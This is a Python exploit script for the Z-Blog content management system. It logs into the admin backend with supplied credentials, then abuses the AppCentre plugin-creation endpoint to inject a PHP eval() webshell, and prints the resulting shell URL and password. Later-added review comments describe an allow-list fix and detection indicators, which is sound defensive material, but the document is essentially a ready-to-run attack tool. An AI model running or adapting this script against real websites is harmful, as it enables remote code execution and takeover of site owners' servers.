ZBlog Background Getshell Exploit
#!/usr/bin/env python | |
# encoding:utf-8 | |
# zblog-background-getshell-exploit | |
# Author : Shutdown_r & WangYihang | |
import requests | |
import hashlib | |
import sys | |
import string | |
# Alphanumeric label that forms the start of the app_id value sent by exploit().
prefix = "image"
# Name of the request parameter that the eval() expression in app_id reads from.
webshell_password = "c"
# Sent as app_path; also the last path component of the URL printed by main().
filename = "update.php"
# One shared HTTP session, so cookies set during login() accompany the request
# made by exploit().
session = requests.Session()
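def check_prefix(prefix):
    """Return True when *prefix* passes the length and character checks.

    The prefix must be at least three characters long and consist only of
    ASCII letters and digits. A message is printed for the first rule that
    fails and False is returned.
    """
    # ascii_letters instead of the locale-dependent string.letters, so the
    # accepted set is exactly the [a-zA-Z0-9] named in the message below.
    allow_chars = string.ascii_letters + string.digits
    if len(prefix) < 3:
        # The test rejects lengths 0-2, so the requirement is ">= 3"; the
        # original message said "> 3", which contradicted the check.
        print("[-] The length of 'prefix' must be >= 3")
        return False
    if any(ch not in allow_chars for ch in prefix):
        print("[-] The prefix must be [a-zA-Z0-9]")
        return False
    return True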
def md5(content):
    """Return the hexadecimal MD5 digest of *content*.

    login() uses this to build the password field of the login form. MD5 is
    a wire-format detail of that form here, not a password-storage scheme.
    """
    digest = hashlib.md5(content)
    return digest.hexdigest()
def login(host, port, username, password):
    """Log in to the Z-Blog admin backend and report whether it succeeded.

    Posts the username and the MD5 hex digest of the password to
    zb_system/cmd.php?act=verify using the module-level session, so any
    cookies the server sets are kept for later requests. Returns True when
    the response body contains the marker text checked on the last line
    (Chinese for "backend home page"), otherwise False.

    NOTE(review): as this script shows it, the form carries only the
    unsalted MD5 of the password over plain http://, which makes the digest
    password-equivalent to anyone able to observe the request. Serving the
    admin backend over TLS only is the relevant control.
    """
    url = "http://%s:%d/zb_system/cmd.php?act=verify" % (host, port)
    data = {
        "username": username,
        "password": md5(password),
    }
    response = session.post(url, data=data)
    content = response.content
    # The marker string is only expected on the page shown after a good login.
    return "后台首页" in content
def exploit(host, port):
    """Send the crafted AppCentre plugin-creation request; return True on success.

    Relies on the authenticated session established by login(), i.e. valid
    admin credentials are a precondition. Posts to
    zb_users/plugin/AppCentre/plugin_edit.php with an app_id made of the
    prefix followed by a single quote and a PHP eval() expression, and with
    app_path set to the module-level filename. Returns True only when the
    response body is empty; prints a message and returns False otherwise.

    NOTE(review), defensive reading: the URL that main() prints uses the
    same app_id string as a directory name under zb_users/plugin/, so the
    endpoint presumably uses app_id both as a path component and inside
    generated PHP without restricting its characters - confirm against the
    Z-Blog source. The server-side fix is an allow-list on app_id (letters,
    digits, underscore). Useful detections: POSTs to plugin_edit.php whose
    app_id contains quotes, "$" or parentheses, and plugin directories
    whose names contain those characters.
    """
    url = "http://%s:%d/zb_users/plugin/AppCentre/plugin_edit.php" % (
        host, port)
    data = {
        "app_id": "%s'.eval($_REQUEST[%s]).'" % (prefix, webshell_password),
        "app_path": filename,
    }
    response = session.post(url, data=data)
    content = response.content
    # Server message: "an APP with the same name already exists".
    if "已存在同名的APP应用" in content:
        print "[-] PlugIn name has been used! Please change the prefix!"
        return False
    # An empty body is what the script treats as success.
    elif len(content) == 0:
        return True
    else:
        print "[-] Unknown error!"
        return False
def main():
    """Parse the command line, log in, send the request and print the result.

    Expects exactly four arguments: HOST PORT USERNAME PASSWORD. Exit codes
    visible here: 1 for a wrong argument count, 2 for a rejected prefix,
    3 for a failed login.
    """
    if len(sys.argv) != 5:
        print "Usage : "
        print "\tpython %s [HOST] [PORT] [USERNAEM] [PASSWORD]" % (sys.argv[0])
        print "Examplt : "
        print "\tpython exploit.py 127.0.0.1 80 admin admin"
        print "Script Author : "
        print "\tWangYihang<wangyihanger@gmail.com>"
        print "vulnerability Author : "
        print "\tShutdown-r"
        exit(1)
    host = sys.argv[1]
    # int() raises ValueError on a non-numeric port; it is not caught here.
    port = int(sys.argv[2])
    username = sys.argv[3]
    password = sys.argv[4]
    if not check_prefix(prefix):
        exit(2)
    # Built for display only. Its directory component is the same app_id
    # string that exploit() posts, so a directory under zb_users/plugin/
    # with quotes and parentheses in its name is an on-disk indicator that
    # this request was accepted.
    webshell_url = "http://%s:%d/zb_users/plugin/%s'.eval($_REQUEST[%s]).'/%s" % (host, port, prefix, webshell_password, filename)
    if not login(host, port, username, password):
        print "[-] Login failed!"
        print "[-] Please check your username and password"
        exit(3)
    print "[+] Login success!"
    print "[+] Starting exploit..."
    if exploit(host, port):
        print "[+] Exploit success!"
        print "[+] Enjoy your shell :"
        print "[+] Url : %s" % (webshell_url)
        print "[+] Pas : c"
        print "[+] Remember to die() it!"
    else:
        print "[-] Exploit failed!"
# Run main() only when the file is executed as a script, not when imported.
if __name__ == "__main__":
    main()